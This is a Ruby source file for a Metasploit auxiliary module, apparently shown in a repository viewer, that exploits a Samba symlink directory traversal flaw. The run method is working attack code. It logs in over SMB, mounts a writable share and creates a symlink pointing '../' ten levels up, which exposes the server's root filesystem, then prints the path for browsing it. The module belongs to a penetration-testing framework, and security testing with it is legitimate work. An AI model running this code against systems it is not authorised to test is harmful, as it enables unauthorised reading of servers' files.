root / modules / auxiliary / admin / smb / samba_symlink_traversal.rb @ master
History | View | Annotate | Download (2 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/
|
| 10 |
##
|
| 11 |
|
| 12 |
|
| 13 |
require 'msf/core'
|
| 14 |
|
| 15 |
|
| 16 |
class Metasploit3 < Msf::Auxiliary |
| 17 |
|
| 18 |
# Exploit mixins should be called first
|
| 19 |
include Msf::Exploit::Remote::SMB |
| 20 |
include Msf::Auxiliary::Report |
| 21 |
|
| 22 |
# Aliases for common classes
|
| 23 |
SIMPLE = Rex::Proto::SMB::SimpleClient |
| 24 |
XCEPT = Rex::Proto::SMB::Exceptions |
| 25 |
CONST = Rex::Proto::SMB::Constants |
| 26 |
|
| 27 |
|
| 28 |
def initialize |
| 29 |
super(
|
| 30 |
'Name' => 'Samba Symlink Directory Traversal', |
| 31 |
'Version' => '$Revision$', |
| 32 |
'Description' => %Q{ |
| 33 |
This module exploits a directory traversal flaw in the Samba |
| 34 |
CIFS server. To exploit this flaw, a writeable share must be specified. |
| 35 |
The newly created directory will link to the root filesystem. |
| 36 |
},
|
| 37 |
'Author' =>
|
| 38 |
[ |
| 39 |
'kcope', # http://lists.grok.org.uk/pipermail/full-disclosure/2010-February/072927.html |
| 40 |
'hdm' # metasploit module |
| 41 |
], |
| 42 |
'References' =>
|
| 43 |
[ |
| 44 |
['OSVDB', '62145'], |
| 45 |
['URL', 'http://www.samba.org/samba/news/symlink_attack.html'] |
| 46 |
], |
| 47 |
'License' => MSF_LICENSE |
| 48 |
) |
| 49 |
|
| 50 |
register_options([ |
| 51 |
OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server']), |
| 52 |
OptString.new('SMBTARGET', [true, 'The name of the directory that should point to the root filesystem', 'rootfs']) |
| 53 |
], self.class)
|
| 54 |
|
| 55 |
end
|
| 56 |
|
| 57 |
|
| 58 |
def run |
| 59 |
print_status("Connecting to the server...")
|
| 60 |
connect() |
| 61 |
smb_login() |
| 62 |
|
| 63 |
print_status("Trying to mount writeable share '#{datastore['SMBSHARE']}'...")
|
| 64 |
self.simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}") |
| 65 |
|
| 66 |
print_status("Trying to link '#{datastore['SMBTARGET']}' to the root filesystem...")
|
| 67 |
self.simple.client.symlink(datastore['SMBTARGET'], "../" * 10) |
| 68 |
|
| 69 |
print_status("Now access the following share to browse the root filesystem:")
|
| 70 |
print_status("\t\\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\")
|
| 71 |
print_line("")
|
| 72 |
end
|
| 73 |
|
| 74 |
end
|